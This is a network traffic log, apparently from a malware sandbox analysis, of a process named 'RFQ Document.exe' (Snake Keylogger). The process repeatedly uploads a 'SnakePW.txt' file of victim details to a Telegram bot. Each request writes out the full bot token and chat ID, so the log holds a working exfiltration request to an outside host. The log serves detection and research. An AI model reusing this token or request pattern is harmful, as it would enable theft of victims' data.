2021-09-28 05:59:09 UTC	275	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:09 UTC	276	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12761,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.2.4	49993	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:09 UTC	276	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255df235a04 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:09 UTC	277	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 32 33 35 61 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255df235a04Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:09 UTC	277	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:09 UTC	277	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12762,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808749,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.2.4	49994	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:11 UTC	278	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255df4279f6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:11 UTC	278	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 34 32 37 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255df4279f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:11 UTC	279	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:11 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:11 UTC	279	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12763,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.2.4	49996	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:11 UTC	280	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dffbb2a4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:11 UTC	280	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 66 66 62 62 32 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dffbb2a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:11 UTC	280	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:11 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:11 UTC	281	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12764,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.2.4	49997	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:11 UTC	281	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e01f7428 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:11 UTC	281	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 31 66 37 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e01f7428Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:11 UTC	282	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:11 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:11 UTC	282	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12765,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.2.4	49998	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:11 UTC	283	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e0374e0e Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:11 UTC	283	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 33 37 34 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e0374e0eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:11 UTC	283	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:11 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:11 UTC	284	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12766,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808751,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
178	192.168.2.4	49999	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:11 UTC	284	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e05df84b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:11 UTC	285	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 35 64 66 38 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e05df84bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:12 UTC	285	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:12 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:12 UTC	285	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12767,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
179	192.168.2.4	50000	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:12 UTC	286	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e08abe89 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:12 UTC	286	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 38 61 62 65 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e08abe89Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:12 UTC	287	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:12 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:12 UTC	287	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64 Data Ascii: 